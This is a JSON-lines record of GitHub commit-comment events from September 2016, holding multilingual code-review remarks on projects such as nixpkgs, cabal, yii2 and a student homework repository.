{"id":"4545725503","type":"CommitCommentEvent","actor":{"login":"kgashok"},"repo":{"name":"kgashok/elm-simple-json-decoding"},"payload":{"comment":{"id":18976865,"position":15,"line":231,"path":"style.css","commit_id":"5860706c21f969e1104188695d2d1d0d76b9e328","created_at":"2016-09-11T12:12:11Z","updated_at":"2016-09-11T12:12:11Z","body":"Idea from http://stackoverflow.com/questions/8184958/add-space-between-html-elements-only-using-css"}},"created_at":"2016-09-11T12:12:11Z"}
{"id":"4545725785","type":"CommitCommentEvent","actor":{"login":"dirkonet"},"repo":{"name":"fsr/nopanic"},"payload":{"comment":{"id":18976866,"position":3,"line":52,"path":"texte/checkliste.tex","commit_id":"e237a99394f260a4ee39fcffebe881037de4bb52","created_at":"2016-09-11T12:12:26Z","updated_at":"2016-09-11T12:12:26Z","body":"Sollten wir hier die Programmierkurseinschreibewebseite erwähnen? Die ist ja relativ neu seit dem letzten Redaktionsschluss."}},"created_at":"2016-09-11T12:12:26Z"}
{"id":"4545727068","type":"CommitCommentEvent","actor":{"login":"sjmielke"},"repo":{"name":"fsr/nopanic"},"payload":{"comment":{"id":18976868,"position":3,"line":52,"path":"texte/checkliste.tex","commit_id":"e237a99394f260a4ee39fcffebe881037de4bb52","created_at":"2016-09-11T12:13:32Z","updated_at":"2016-09-11T12:13:32Z","body":"@jgonsior sagt: \"wenn wir da einen link zum Kurssystem reintun fragen sich die erstis alle warum sie sich nicht einschreiben können, von daher finde ich den Hinweis auf der ifsr Seite nachzugucken gar nicht so schlecht\"\r\nKlingt sinnvoll."}},"created_at":"2016-09-11T12:13:32Z"}
{"id":"4545728416","type":"CommitCommentEvent","actor":{"login":"dirkonet"},"repo":{"name":"fsr/nopanic"},"payload":{"comment":{"id":18976869,"position":3,"line":52,"path":"texte/checkliste.tex","commit_id":"e237a99394f260a4ee39fcffebe881037de4bb52","created_at":"2016-09-11T12:14:29Z","updated_at":"2016-09-11T12:14:29Z","body":"Ach ja, ich vergaß, die Erstis werden ja auch immer d…rängelnder."}},"created_at":"2016-09-11T12:14:29Z"}
{"id":"4545730268","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18976872,"position":null,"line":null,"path":null,"commit_id":"c534171d377561b35a3c015e2f46a46ba399fac3","created_at":"2016-09-11T12:16:06Z","updated_at":"2016-09-11T12:16:06Z","body":"Estamos a falar de coisas diferentes estás a mostrar-me a tradução do inglês e a string serve só no 6.0 e não no MiuiSystemUI falamos de strings diferentes. Então deixa assim nos 6.0 e altera A ligar... na MiuiSystemUI pois é no menu inicial de configuração do Wi-Fi. Porque esse a ligado, sem internet não aparece nos Android 5.0.\r\n\r\nInsere as alterações pendentes que eu tenho mais para colocar..."}},"created_at":"2016-09-11T12:16:06Z"}
{"id":"4545731170","type":"CommitCommentEvent","actor":{"login":"MaXL-ru"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18976874,"position":8,"line":109,"path":"framework/i18n/GettextMessageSource.php","commit_id":"c3c0d04f5bc58c5ad08da13797e27d956ebec043","created_at":"2016-09-11T12:16:50Z","updated_at":"2016-09-11T12:16:50Z","body":"maybe write: !in_array($fallbackLanguage, [$this->sourceLanguage, substr($this->sourceLanguage, 0, 2)], true)"}},"created_at":"2016-09-11T12:16:50Z"}
{"id":"4545731890","type":"CommitCommentEvent","actor":{"login":"Feliix42"},"repo":{"name":"fsr/nopanic"},"payload":{"comment":{"id":18976876,"position":3,"line":52,"path":"texte/checkliste.tex","commit_id":"e237a99394f260a4ee39fcffebe881037de4bb52","created_at":"2016-09-11T12:17:28Z","updated_at":"2016-09-11T12:17:28Z","body":"Aber da die Datenbank in den nächsten Tagen geleert wird, sind dann einfach keine Kurse zum Einschreiben da. ^^\n\n> On 11 Sep 2016, at 14:14, dirko <notifications@github.com> wrote:\n> \n> Ach ja, ich vergaß, die Erstis werden ja auch immer d…rängelnder.\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-11T12:17:28Z"}
{"id":"4545732951","type":"CommitCommentEvent","actor":{"login":"sjmielke"},"repo":{"name":"fsr/nopanic"},"payload":{"comment":{"id":18976877,"position":3,"line":52,"path":"texte/checkliste.tex","commit_id":"e237a99394f260a4ee39fcffebe881037de4bb52","created_at":"2016-09-11T12:18:19Z","updated_at":"2016-09-11T12:18:19Z","body":"Wenn du das nett formulierst, dass es da weiter geht, schieb es gerne wieder rein, aber dann in vollständigen Sätzen :P"}},"created_at":"2016-09-11T12:18:19Z"}
{"id":"4545733766","type":"CommitCommentEvent","actor":{"login":"Draveness"},"repo":{"name":"MModel/MetaModel"},"payload":{"comment":{"id":18976878,"position":null,"line":null,"path":null,"commit_id":"522f3c048034880c350747ad569c393a1b63d640","created_at":"2016-09-11T12:19:03Z","updated_at":"2016-09-11T12:19:03Z","body":"reference to #22 "}},"created_at":"2016-09-11T12:19:03Z"}
{"id":"4545734125","type":"CommitCommentEvent","actor":{"login":"caleblloyd"},"repo":{"name":"PomeloFoundation/Pomelo.EntityFrameworkCore.MySql"},"payload":{"comment":{"id":18976879,"position":null,"line":null,"path":null,"commit_id":"7354ecf6dbf211721104943f878c07ad53c52581","created_at":"2016-09-11T12:19:22Z","updated_at":"2016-09-11T12:19:22Z","body":" If the consumer of the DbDataReader does not explicitly dispose it, then it will not get disposed until a GC cycle occurs.  If references to the DbDataReader are hanging around, the DbDataReader will never get disposed and it's lock will be held forever.\r\n\r\nI think a \"Close ASAP\" policy would be best.  If the DbDataReader reaches the end of all result sets, it should close itself then.  It should provide an async CloseNotifier method to let all interested callers receive a notification that the DbDataReader has been closed."}},"created_at":"2016-09-11T12:19:22Z"}
{"id":"4545736418","type":"CommitCommentEvent","actor":{"login":"mdorman"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18976880,"position":null,"line":null,"path":null,"commit_id":"c6460fb0cbda179b83558a6e19c13a2d5f81a5ed","created_at":"2016-09-11T12:21:19Z","updated_at":"2016-09-11T12:21:19Z","body":"@shlevy Having fallen into this trap myself: In removing `f` from `emacs-packages.nix`, I suspect you broke the `helm-bibtex` package that depends on it.\r\n\r\nAlso `melpa-generated` is supposed to be a generated file---perhaps you did regenerate it, but there only being two changes since the last time it was regenerated seems...improbable. :)\r\n\r\n@ttuegel is there any strategy we could adopt to have the package definitions in `emacs-packages.nix` be references to the generated package definitions (when feasible, I know there are things like `cask` where that's probably not feasible), so that even if `emacs-packages.nix` were maintained for backward compatibility for some time, it wouldn't be a source of actual distinct packages, and therefore a confusing maintenance regime?"}},"created_at":"2016-09-11T12:21:19Z"}
{"id":"4545736802","type":"CommitCommentEvent","actor":{"login":"AdvancedStyle"},"repo":{"name":"leocaseiro/WordPress-Plugin-Custom-Options-Plus"},"payload":{"comment":{"id":18976882,"position":null,"line":null,"path":null,"commit_id":"97a7b35a4529c847b4c810b7ed029ab6d1458134","created_at":"2016-09-11T12:21:38Z","updated_at":"2016-09-11T12:21:38Z","body":"Wordpress requirements:\r\nPHP version 5.2.4 or greater\r\n\r\nShould always write your plugin code to be compatible with standard wordpress requirements."}},"created_at":"2016-09-11T12:21:38Z"}
{"id":"4545737376","type":"CommitCommentEvent","actor":{"login":"nealgosalia"},"repo":{"name":"ashwinr64/android_device_oneplus_onyx"},"payload":{"comment":{"id":18976884,"position":null,"line":null,"path":null,"commit_id":"97ae0d3a5144b0401d32c0b83039f20dd68c93fd","created_at":"2016-09-11T12:22:09Z","updated_at":"2016-09-11T12:22:09Z","body":"Dekho, Australia se **Kang**aroo aaya hai!"}},"created_at":"2016-09-11T12:22:09Z"}
{"id":"4545737630","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18976885,"position":7,"line":33,"path":"src/full/Agda/TypeChecking/Implicit.hs","commit_id":"344296cf06cedd13736e50bb53e63217d9f19ecf","created_at":"2016-09-11T12:22:20Z","updated_at":"2016-09-11T12:22:20Z","body":"You removed the `ExplicitToInstance` argument, but did not update the documentation!"}},"created_at":"2016-09-11T12:22:20Z"}
{"id":"4545738912","type":"CommitCommentEvent","actor":{"login":"iennae"},"repo":{"name":"chef-cookbooks/yum-epel"},"payload":{"comment":{"id":18976887,"position":10,"line":4,"path":"attributes/epel-testing.rb","commit_id":"a494a64333ebb600d57cf4a5c9226ecaf2baa1d9","created_at":"2016-09-11T12:23:24Z","updated_at":"2016-09-11T12:23:24Z","body":"Yep, thanks for catching. "}},"created_at":"2016-09-11T12:23:24Z"}
{"id":"4545739529","type":"CommitCommentEvent","actor":{"login":"fireglow"},"repo":{"name":"EnterpriseDB/mysql_fdw"},"payload":{"comment":{"id":18976888,"position":null,"line":null,"path":null,"commit_id":"31c6612732d993685120528bac049fd507db5878","created_at":"2016-09-11T12:23:58Z","updated_at":"2016-09-11T12:23:58Z","body":"👎 \r\n> but it still works without the RTLD_DEEPBIND\r\n"}},"created_at":"2016-09-11T12:23:58Z"}
{"id":"4545741247","type":"CommitCommentEvent","actor":{"login":"B3CKDOOR"},"repo":{"name":"B3CKDOOR/B3CKDOOR-BOT"},"payload":{"comment":{"id":18976889,"position":19,"line":128,"path":"B3CKDOOR-BOT/Program.cs","commit_id":"bcc8af217b1e489f40f0ccf92428390d4ffa1a8f","created_at":"2016-09-11T12:25:19Z","updated_at":"2016-09-11T12:25:19Z","body":"Instead of a local task moved task to other class file"}},"created_at":"2016-09-11T12:25:19Z"}
{"id":"4545742843","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18976890,"position":null,"line":null,"path":null,"commit_id":"c534171d377561b35a3c015e2f46a46ba399fac3","created_at":"2016-09-11T12:26:44Z","updated_at":"2016-09-11T12:26:44Z","body":"Eu vou apagar estes comentários porque às vezes em vez de trabalharmos em conjunto discutimos o indiscutível... "}},"created_at":"2016-09-11T12:26:44Z"}
{"id":"4545744487","type":"CommitCommentEvent","actor":{"login":"ls5302"},"repo":{"name":"ryanbagwell/wordpress-sentry"},"payload":{"comment":{"id":18976893,"position":null,"line":null,"path":null,"commit_id":"05abb6572b3a3f45e2d9c5028ac0d412948bff6b","created_at":"2016-09-11T12:28:04Z","updated_at":"2016-09-11T12:28:04Z","body":"I understand the desire to only want one instance of the Sentry client, but this isn't a true Singleton as the constructor is public and nothing prevents another instance of this class being created.\r\n\r\nWould it not be better to forget about the singleton design pattern and define a static property called client, and in the constructor assign `new WP_Raven_Client()` to this property.  The client can then simply be retrieved using a get client method."}},"created_at":"2016-09-11T12:28:04Z"}
{"id":"4545745193","type":"CommitCommentEvent","actor":{"login":"VladimirMangos"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":18976894,"position":4,"line":34,"path":"src/game/AI/CreatureEventAI.h","commit_id":"acaabca4cd5ec3bdd76f073031391a7bb39318ad","created_at":"2016-09-11T12:28:38Z","updated_at":"2016-09-11T12:28:38Z","body":"Maybe move to .cpp"}},"created_at":"2016-09-11T12:28:38Z"}
{"id":"4545747601","type":"CommitCommentEvent","actor":{"login":"thimhogberg"},"repo":{"name":"linuslofgren/rudebecks"},"payload":{"comment":{"id":18976895,"position":null,"line":null,"path":null,"commit_id":"9398bcd0a2d9d031fdf402c802ebaca5076678e6","created_at":"2016-09-11T12:30:35Z","updated_at":"2016-09-11T12:30:35Z","body":"awesome"}},"created_at":"2016-09-11T12:30:35Z"}
{"id":"4545748308","type":"CommitCommentEvent","actor":{"login":"ttuegel"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18976896,"position":null,"line":null,"path":null,"commit_id":"c6460fb0cbda179b83558a6e19c13a2d5f81a5ed","created_at":"2016-09-11T12:31:12Z","updated_at":"2016-09-11T12:31:12Z","body":"> Also melpa-generated is supposed to be a generated file---perhaps you did regenerate it, but there only being two changes since the last time it was regenerated seems...improbable. :)\r\n\r\n`melpa2nix` supports updating only particular packages.\r\n\r\n> is there any strategy we could adopt to have the package definitions in emacs-packages.nix be references to the generated package definitions (when feasible, I know there are things like cask where that's probably not feasible), so that even if emacs-packages.nix were maintained for backward compatibility for some time, it wouldn't be a source of actual distinct packages, and therefore a confusing maintenance regime?\r\n\r\nI'm not sure I understand what you're asking. How could `emacs-packages.nix` be maintained for backward compatibility without being a source of distinct packages?"}},"created_at":"2016-09-11T12:31:12Z"}
{"id":"4545749268","type":"CommitCommentEvent","actor":{"login":"leo"},"repo":{"name":"RocketMod/Rocket"},"payload":{"comment":{"id":18976898,"position":null,"line":null,"path":null,"commit_id":"069fc895b8874e9024c9f67d2a54bd121f123fde","created_at":"2016-09-11T12:31:58Z","updated_at":"2016-09-11T12:31:58Z","body":"Wrong username! 😄 "}},"created_at":"2016-09-11T12:31:58Z"}
{"id":"4545749356","type":"CommitCommentEvent","actor":{"login":"whatyouhide"},"repo":{"name":"lexmag/fluxter"},"payload":{"comment":{"id":18976899,"position":20,"line":53,"path":"lib/fluxter/conn.ex","commit_id":"5e649f0dfc57ec824f088c6ae594ad14429127bd","created_at":"2016-09-11T12:32:03Z","updated_at":"2016-09-11T12:32:03Z","body":"Maybe \"Failed to send metric with reason: \"? It sounds slightly more clear, wdyt? :)"}},"created_at":"2016-09-11T12:32:03Z"}
{"id":"4545749400","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"pixelated/pixelated-user-agent"},"payload":{"comment":{"id":18976900,"position":null,"line":null,"path":null,"commit_id":"69cbc6713bb156a845e9a616b35927cfce8cf70c","created_at":"2016-09-11T12:32:05Z","updated_at":"2016-09-11T12:32:05Z","body":"This script will bombard the server with a large number of requests for the interstitial - no pause whatsoever between requests. I suspect that will put more artificial load on the server and give you problematic numbers. I would suggest sleeping 50 or 100ms inbetween each call to check_inbox. This of course means that the skew of total time will be of by 25 to 50ms on average, but I think that's acceptable for measuring the total time."}},"created_at":"2016-09-11T12:32:05Z"}
{"id":"4545749513","type":"CommitCommentEvent","actor":{"login":"limjh16"},"repo":{"name":"TipsyOs/frameworks_opt_telephony"},"payload":{"comment":{"id":18976901,"position":null,"line":null,"path":null,"commit_id":"76d3e8f11fc84f198f2abbebd9195920336abc56","created_at":"2016-09-11T12:32:10Z","updated_at":"2016-09-11T12:32:10Z","body":"@Alx31 in that case then revert this commit."}},"created_at":"2016-09-11T12:32:10Z"}
{"id":"4545750837","type":"CommitCommentEvent","actor":{"login":"shlevy"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18976902,"position":null,"line":null,"path":null,"commit_id":"c6460fb0cbda179b83558a6e19c13a2d5f81a5ed","created_at":"2016-09-11T12:33:10Z","updated_at":"2016-09-11T12:33:10Z","body":"@mdorman Why don't we just make helm-bibtex depend on emacsPackagesNg.f?"}},"created_at":"2016-09-11T12:33:10Z"}
{"id":"4545751317","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18976903,"position":null,"line":null,"path":null,"commit_id":"472ac50f5b10f4b3b4bfc03399dc2e34425f18b6","created_at":"2016-09-11T12:33:36Z","updated_at":"2016-09-11T12:33:36Z","body":"In any case, tarball builds OK in current master."}},"created_at":"2016-09-11T12:33:36Z"}
{"id":"4545751514","type":"CommitCommentEvent","actor":{"login":"vokins"},"repo":{"name":"vokins/yhosts"},"payload":{"comment":{"id":18976904,"position":null,"line":null,"path":null,"commit_id":"7445e35d4ebaaf12562e862bf1907432074a2990","created_at":"2016-09-11T12:33:45Z","updated_at":"2016-09-11T12:33:45Z","body":"一号店无故取消我的订单，故永久屏蔽。"}},"created_at":"2016-09-11T12:33:45Z"}
{"id":"4545754861","type":"CommitCommentEvent","actor":{"login":"Alectradar"},"repo":{"name":"ashwinr64/android_device_oneplus_onyx"},"payload":{"comment":{"id":18976905,"position":null,"line":null,"path":null,"commit_id":"97ae0d3a5144b0401d32c0b83039f20dd68c93fd","created_at":"2016-09-11T12:36:36Z","updated_at":"2016-09-11T12:36:36Z","body":"Plagiarism at it's best"}},"created_at":"2016-09-11T12:36:36Z"}
{"id":"4545756871","type":"CommitCommentEvent","actor":{"login":"leopedrassoli"},"repo":{"name":"leopedrassoli/ESOF"},"payload":{"comment":{"id":18976906,"position":null,"line":null,"path":null,"commit_id":"2445b4be69a04255dc00facf0b06fbbf5d841543","created_at":"2016-09-11T12:38:19Z","updated_at":"2016-09-11T12:38:19Z","body":"Trabalho 3"}},"created_at":"2016-09-11T12:38:19Z"}
{"id":"4545757115","type":"CommitCommentEvent","actor":{"login":"demmm"},"repo":{"name":"KaOSx/main"},"payload":{"comment":{"id":18976907,"position":null,"line":null,"path":null,"commit_id":"4998dff4d77797c1826d9f905752d5d724e45404","created_at":"2016-09-11T12:38:33Z","updated_at":"2016-09-11T12:38:33Z","body":"Update removed from build, many bug reports of Samba, nmdb service failing with 0.9.30, not just KaOS."}},"created_at":"2016-09-11T12:38:33Z"}
{"id":"4545757802","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976909,"position":null,"line":null,"path":null,"commit_id":"1883fe67598090cf8bf180d28599d37a0863a569","created_at":"2016-09-11T12:39:06Z","updated_at":"2016-09-11T12:39:06Z","body":"@erinl1 Have you taken a look at the reading material I posted on Slack? That would be a first step."}},"created_at":"2016-09-11T12:39:06Z"}
{"id":"4545758526","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976910,"position":null,"line":null,"path":null,"commit_id":"1883fe67598090cf8bf180d28599d37a0863a569","created_at":"2016-09-11T12:39:44Z","updated_at":"2016-09-11T12:39:44Z","body":"I need you to turn this into a PR similar to homework #0 since I can't follow it with individual commits."}},"created_at":"2016-09-11T12:39:44Z"}
{"id":"4545760288","type":"CommitCommentEvent","actor":{"login":"lucasbhjf"},"repo":{"name":"leocaseiro/WordPress-Plugin-Custom-Options-Plus"},"payload":{"comment":{"id":18976913,"position":null,"line":null,"path":null,"commit_id":"97a7b35a4529c847b4c810b7ed029ab6d1458134","created_at":"2016-09-11T12:41:02Z","updated_at":"2016-09-11T12:41:02Z","body":"Guess not, https://wordpress.org/about/requirements/\r\nTo run WordPress we recommend your host supports:\r\nPHP version 5.6 or greater\r\nMySQL version 5.6 or greater OR MariaDB version 10.0 or greater\r\n\r\nWe strongly recommend the latest versions of PHP and MySQL, but we understand that this isn’t right for everyone, and that sometimes hosts can be slow or hesitant to upgrade their customers since upgrades to PHP and MySQL have historically broken applications.\r\n\r\nWordPress will always work on the latest versions of PHP and MySQL, which are often faster and more stable.\r\n\r\n"}},"created_at":"2016-09-11T12:41:02Z"}
{"id":"4545760883","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976914,"position":null,"line":null,"path":null,"commit_id":"1883fe67598090cf8bf180d28599d37a0863a569","created_at":"2016-09-11T12:41:35Z","updated_at":"2016-09-11T12:41:35Z","body":"Here's what I want you to do. I want you to comment each line of code and explain to me what it's doing. I see the problem, but I need you to be able to read your own code."}},"created_at":"2016-09-11T12:41:35Z"}
{"id":"4545763420","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976916,"position":null,"line":null,"path":null,"commit_id":"1883fe67598090cf8bf180d28599d37a0863a569","created_at":"2016-09-11T12:43:41Z","updated_at":"2016-09-11T12:43:41Z","body":"ok! i'll rubber duck!"}},"created_at":"2016-09-11T12:43:41Z"}
{"id":"4545764402","type":"CommitCommentEvent","actor":{"login":"cong4212"},"repo":{"name":"cong4212/PHP"},"payload":{"comment":{"id":18976918,"position":null,"line":null,"path":null,"commit_id":"7bb04ad5fabf4028da44ba484bf62a4c18487062","created_at":"2016-09-11T12:44:26Z","updated_at":"2016-09-11T12:44:26Z","body":"aaaaaaaaaaaaaa"}},"created_at":"2016-09-11T12:44:26Z"}
{"id":"4545764533","type":"CommitCommentEvent","actor":{"login":"Maxibond"},"repo":{"name":"whotake/photobattle"},"payload":{"comment":{"id":18976919,"position":1,"line":1,"path":"PhotoBattle/templates/PhotoBattle/photo_input.html","commit_id":"95e642cb3d85fed665a068c2b540afeb972aa230","created_at":"2016-09-11T12:44:32Z","updated_at":"2016-09-11T12:44:32Z","body":"Этот код скопирован с документации. Пока не используется, и скорее всего будет удалён."}},"created_at":"2016-09-11T12:44:32Z"}
{"id":"4545764620","type":"CommitCommentEvent","actor":{"login":"cong4212"},"repo":{"name":"cong4212/PHP"},"payload":{"comment":{"id":18976920,"position":null,"line":null,"path":null,"commit_id":"7bb04ad5fabf4028da44ba484bf62a4c18487062","created_at":"2016-09-11T12:44:35Z","updated_at":"2016-09-11T12:44:35Z","body":"bbbbbbbbbbbbbbbbb"}},"created_at":"2016-09-11T12:44:35Z"}
{"id":"4545767466","type":"CommitCommentEvent","actor":{"login":"Alberto97"},"repo":{"name":"Moto8610/android_device_motorola_msm8610-common"},"payload":{"comment":{"id":18976922,"position":null,"line":null,"path":null,"commit_id":"7aa8b8503b18568626206cc00c7d87025d97d3d9","created_at":"2016-09-11T12:46:48Z","updated_at":"2016-09-11T12:46:48Z","body":"Did you already try this one? https://github.com/CyanogenMod/android_kernel_motorola_msm8916/commit/ab12d38e17ef5371e20fe92c361fda6ff514a73f"}},"created_at":"2016-09-11T12:46:48Z"}
{"id":"4545767963","type":"CommitCommentEvent","actor":{"login":"lexmag"},"repo":{"name":"lexmag/fluxter"},"payload":{"comment":{"id":18976923,"position":20,"line":53,"path":"lib/fluxter/conn.ex","commit_id":"5e649f0dfc57ec824f088c6ae594ad14429127bd","created_at":"2016-09-11T12:47:13Z","updated_at":"2016-09-11T12:47:13Z","body":"Yeah, updated: https://github.com/lexmag/fluxter/commit/49edcc24fb0c9a8d7deec2104f8a2b0b1c0b31af."}},"created_at":"2016-09-11T12:47:13Z"}
{"id":"4545768056","type":"CommitCommentEvent","actor":{"login":"juggernautsei"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18976925,"position":null,"line":null,"path":"interface/weno/markTx.php","commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-11T12:47:18Z","updated_at":"2016-09-11T12:47:18Z","body":"We are leveraging the Zend library that already exist. We did not add Zend. "}},"created_at":"2016-09-11T12:47:18Z"}
{"id":"4545768196","type":"CommitCommentEvent","actor":{"login":"Lazai"},"repo":{"name":"Lazai/hello-world"},"payload":{"comment":{"id":18976926,"position":null,"line":null,"path":null,"commit_id":"94a764b14d0000f62cf6cb7ba13daffdf4c1dce0","created_at":"2016-09-11T12:47:25Z","updated_at":"2016-09-11T12:47:25Z","body":">readme.edits\r\n\r\n\r\n\r\n> 0 comments on commit 94a764b\r\n\r\n"}},"created_at":"2016-09-11T12:47:25Z"}
{"id":"4545768572","type":"CommitCommentEvent","actor":{"login":"nilzao"},"repo":{"name":"nilzao/soapbox-race-udp"},"payload":{"comment":{"id":18976927,"position":null,"line":null,"path":null,"commit_id":"2c3b4d18a22876e6ee1b12108ec045ebf83e0a1d","created_at":"2016-09-11T12:47:42Z","updated_at":"2016-09-11T12:47:42Z","body":"No, just renaming classes and calls."}},"created_at":"2016-09-11T12:47:42Z"}
{"id":"4545768962","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18976928,"position":null,"line":null,"path":null,"commit_id":"1883fe67598090cf8bf180d28599d37a0863a569","created_at":"2016-09-11T12:48:02Z","updated_at":"2016-09-11T12:48:02Z","body":"Rubber duck for a bit and if you're still stuck let me know. I think you'll be able to spot the error :)"}},"created_at":"2016-09-11T12:48:02Z"}
{"id":"4545772734","type":"CommitCommentEvent","actor":{"login":"Wilsonator5000"},"repo":{"name":"Wilsonator5000/Neefertale"},"payload":{"comment":{"id":18976930,"position":null,"line":null,"path":null,"commit_id":"3d8ce168bc8c77508a93d2f43abdf4d95e822958","created_at":"2016-09-11T12:50:54Z","updated_at":"2016-09-11T12:50:54Z","body":"Someone finish the Sans text while I'm working on the sprites, try to continue what I did with replacing only main words and themes."}},"created_at":"2016-09-11T12:50:54Z"}
{"id":"4545773668","type":"CommitCommentEvent","actor":{"login":"adrientetar"},"repo":{"name":"trufont/trufont"},"payload":{"comment":{"id":18976931,"position":null,"line":null,"path":null,"commit_id":"457111e6d1402acc7fe4842736e89ebc44744eef","created_at":"2016-09-11T12:51:37Z","updated_at":"2016-09-11T12:51:37Z","body":":+1:"}},"created_at":"2016-09-11T12:51:37Z"}
{"id":"4545773947","type":"CommitCommentEvent","actor":{"login":"anakalo"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18976932,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-11T12:51:52Z","updated_at":"2016-09-11T12:51:52Z","body":"@bokatan Actually I don't agree and their policy is fine. Fan art or not it's still the property of the artist because they CREATED it, regardless of what it depicts. Plus, sharing someone else's work is just disrespectful and unnecessary - go to that artist's tumblr and reblog or if they don't have one leave it be. You're the one in the wrong."}},"created_at":"2016-09-11T12:51:52Z"}
{"id":"4545774162","type":"CommitCommentEvent","actor":{"login":"ttuegel"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18976933,"position":29,"line":212,"path":"Cabal/Distribution/Simple/GHCJS.hs","commit_id":"e7d2a62c84d71ca565d9af1f4d063330ea48da5f","created_at":"2016-09-11T12:52:03Z","updated_at":"2016-09-11T12:52:03Z","body":"@23Skidoo You're quite right, that function is unused now."}},"created_at":"2016-09-11T12:52:03Z"}
{"id":"4545775219","type":"CommitCommentEvent","actor":{"login":"wangshuaixin"},"repo":{"name":"wangshuaixin/friends"},"payload":{"comment":{"id":18976934,"position":null,"line":null,"path":null,"commit_id":"2377dcba1dd17967e0e43e5dcdf43b0654936be9","created_at":"2016-09-11T12:52:53Z","updated_at":"2016-09-11T12:52:53Z","body":"change spring-boot"}},"created_at":"2016-09-11T12:52:53Z"}
{"id":"4545776171","type":"CommitCommentEvent","actor":{"login":"ttuegel"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18976935,"position":24,"line":288,"path":"Cabal/Distribution/Simple/GHC.hs","commit_id":"e7d2a62c84d71ca565d9af1f4d063330ea48da5f","created_at":"2016-09-11T12:53:39Z","updated_at":"2016-09-11T12:53:39Z","body":"@ezyang Sure, I can add a `debug` statement. What do you mean by \"how we were affected by it\"? The effect of GHC_PACKAGE_PATH is the same effect it has on GHC: the listed package databases are searched before any listed on the command line. Is that all you want the message to say?"}},"created_at":"2016-09-11T12:53:39Z"}
{"id":"4545777545","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18976936,"position":5,"line":40,"path":"src/pocketmine/network/protocol/PlayerListPacket.php","commit_id":"9bb68f219c6caca0e9bc1414cc135e6b444b8aa8","created_at":"2016-09-11T12:54:46Z","updated_at":"2016-09-11T12:54:46Z","body":"The eiseif is useless, because it does the same as the else"}},"created_at":"2016-09-11T12:54:46Z"}
{"id":"4545779036","type":"CommitCommentEvent","actor":{"login":"ronytomen"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":18976939,"position":null,"line":null,"path":null,"commit_id":"bdf8f0735e6535fa61e8f03295c95f0bbcae789d","created_at":"2016-09-11T12:55:55Z","updated_at":"2016-09-11T12:55:55Z","body":"sky93 please fork the **develop** branch and perform pull request from that branch."}},"created_at":"2016-09-11T12:55:55Z"}
{"id":"4545779161","type":"CommitCommentEvent","actor":{"login":"totoberg123"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18976940,"position":null,"line":null,"path":null,"commit_id":"14c2d8b39f3afcafcc1ac3d4d2b7f9cc691d8b32","created_at":"2016-09-11T12:56:01Z","updated_at":"2016-09-11T12:56:01Z","body":"🎉"}},"created_at":"2016-09-11T12:56:01Z"}
{"id":"4545782495","type":"CommitCommentEvent","actor":{"login":"ezyang"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18976942,"position":24,"line":288,"path":"Cabal/Distribution/Simple/GHC.hs","commit_id":"e7d2a62c84d71ca565d9af1f4d063330ea48da5f","created_at":"2016-09-11T12:58:49Z","updated_at":"2016-09-11T12:58:49Z","body":"How about something like, \"Here is the full list of package databases, considering all sources (environment variable and flags.)\" (the log message wouldn't say all that but that should be the contents.)"}},"created_at":"2016-09-11T12:58:49Z"}
{"id":"4545788102","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":18976946,"position":4,"line":0,"path":"documentation/manual/working/commonGuide/database/Developing-with-the-H2-Database.md","commit_id":"7720ba4e723cd3c778bf6ea37360444e0b1ab199","created_at":"2016-09-11T13:03:03Z","updated_at":"2016-09-11T13:03:03Z","body":"\"JDBC module\""}},"created_at":"2016-09-11T13:03:03Z"}
{"id":"4545792414","type":"CommitCommentEvent","actor":{"login":"AlexBaier"},"repo":{"name":"Institute-Web-Science-and-Technologies/OKB"},"payload":{"comment":{"id":18976948,"position":null,"line":null,"path":null,"commit_id":"e6d21577b647f0b5e4080e61de27580d6a5dd274","created_at":"2016-09-11T13:06:18Z","updated_at":"2016-09-11T13:06:18Z","body":"Commit message is wrong. Should say \"Added loading of db configuration from file.\""}},"created_at":"2016-09-11T13:06:18Z"}
